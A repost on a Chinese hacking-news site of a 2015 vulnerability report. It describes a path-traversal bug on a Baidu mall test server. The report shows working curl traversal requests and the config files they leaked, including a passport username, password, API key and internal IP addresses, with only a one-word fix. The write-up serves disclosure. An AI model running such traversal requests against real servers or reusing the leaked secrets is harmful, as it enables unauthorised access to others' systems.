记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

百度某待上线业务配置错误导致源码泄露

2015-09-08 00:40

百度商城,貌似还没上线的业务(MALL.baidu.com)啊;http://180.149.144.64 这个是测试环境,尼玛node.js的,?诺囊槐省?/p>


首先是这样的。


[root@li498-106 ~]# curl "http://180.149.144.64/xxx"

Not Found, url:/xxx


Error: Not Found, url:/xxx
at /home/work/mall_online/mall/app.js:50:15
at Layer.handle [as handle_request] (/home/work/mall_online/mall/node_modules/express/lib/router/layer.js:82:5)
at trim_prefix (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:302:13)
at /home/work/mall_online/mall/node_modules/express/lib/router/index.js:270:7
at Function.proto.process_params (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:321:12)
at next (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:261:10)
at SendStream.error (/home/work/mall_online/mall/node_modules/express/node_modules/serve-static/index.js:107:7)
at SendStream.emit (events.js:107:17)
at SendStream.error (/home/work/mall_online/mall/node_modules/express/node_modules/send/index.js:250:17)
at SendStream.onStatError (/home/work/mall_online/mall/node_modules/express/node_modules/send/index.js:346:48)
<script>
var GLOBAL_CONF = {"debug":true,"passport":{"host":"passport.rdtest.baidu.com","tpl":"cmovie"}};
</script>


有报错,目测可以读文件,原谅我没有能读取系统任意文件,但是代码文件是可以随意读


[root@li498-106 ~]# curl "http://180.149.144.64/../../../../../../../../../../..//../../..//home/work/mall_online/mall/app/../config/passport.js"
/**
* @file passport.js
* @author pengxing ([email protected])
* @description
* passport conf
*/

module.exports = {

host: 'wappass.baidu.com',

apid: 0x0523,
tpl: 'cmovie',
app_user: 'cmovie',
app_passwd: 'cmovie',
sapi: {
'cmovie_1315': '14c7e9fbcdb6d1eac8d6cc4b885babc8'
},
server: {
session: {
port: 7801,
timeout: 1000,
servers: []
}
}

};

// 机器列表 http://tc-passport-op00.tc.baidu.com/authorize/session/apply
// 根据当前的idc,来判断请求哪个passport
switch (process.env.IDC) {
case 'hz':
case 'nj':
// hz机房只有链接这两个机器才比较快
module.exports.server.session.servers = [
{
ip: '10.212.7.12'
},
{
ip: '10.208.7.34'
},
{
ip: '10.202.6.38'
}
];

break;
// bj机房连接这四个passport都很快
case 'bj':
default:
module.exports.server.session.servers = [
{
ip: '10.36.7.65'
},
{
ip: '10.65.211.140'
},
{
ip: '10.26.7.72'
},
{
ip: '10.81.211.104'
}
];
}

/////////////////////////////////////////

var globalConf = require('./global');

if (globalConf.debug) {
var offline = {
host: 'passport.rdtest.baidu.com',

server: {
session: {
port: 8998,
timeout: 3000,
servers: [
{
ip: "10.48.20.13"
}
]
}
}
};

module.exports.host = offline.host;
module.exports.server = offline.server;
}

[root@li498-106 ~]# curl "http://180.149.144.64/../../../../../../../../../../..//../../..//home/work/mall_online/mall/app/config.js"
var movie = require('./movie');
var users = require('./users');
var goodsList = require('./goodsList');
var index = require('./index');
var product = require('./product');
var cart = require('./cart');
var orderSure = require('./orderSure');
var address = require('./address');
var market = require('./market');
var shop = require('./shop');
var user = require('./user');
var dal = require('../lib/dal');
var url = require('./url');

var common = require('./common');
var test = require('./test');
var login = require('./login');
var flpurchase=require('./flpurchase');

module.exports = function(app) {

// 这个对象会作为前端的全局config对象使用
// 后续 config/categories 里的数据也用这种方式引入,避免每个请求都去处理一次。@shanshan
app.locals.frontendConfig = {
debug: require('../config/global').debug,
passport: {
host: require('../config/passport').host,
tpl: require('../config/passport').tpl,
}
};

app.locals.menuCategories = require('../config/categories');

// passport
var passport = require('../lib/middlewares/passport');

// app.use(passport.passport);

app.get('/user/loginInfo', passport.passport, function (req, res ,next) {
res.send(res.locals.user);
});

app.use('/test', test);
app.use('/login', login);
app.use('/flpurchase',flpurchase);
app.use('/common', common);
app.use(url.homeIndex, user);

app.get('/', index.home);

app.use('/shop', shop);

app.get('/movie/hot', movie.hot);
app.get('/users', users.index);

app.get('/goodsList', goodsList.search);

app.use('/product',product);
// app.get('/item/:id', product.product);

app.use('/cart', cart);

app.use('/market', market);

app.use('/order', orderSure);

app.use('/address', address);

};

 

解决方案:

过滤

 
知识来源: www.2cto.com/Article/201509/441457.html

阅读:119250 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“百度某待上线业务配置错误导致源码泄露”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词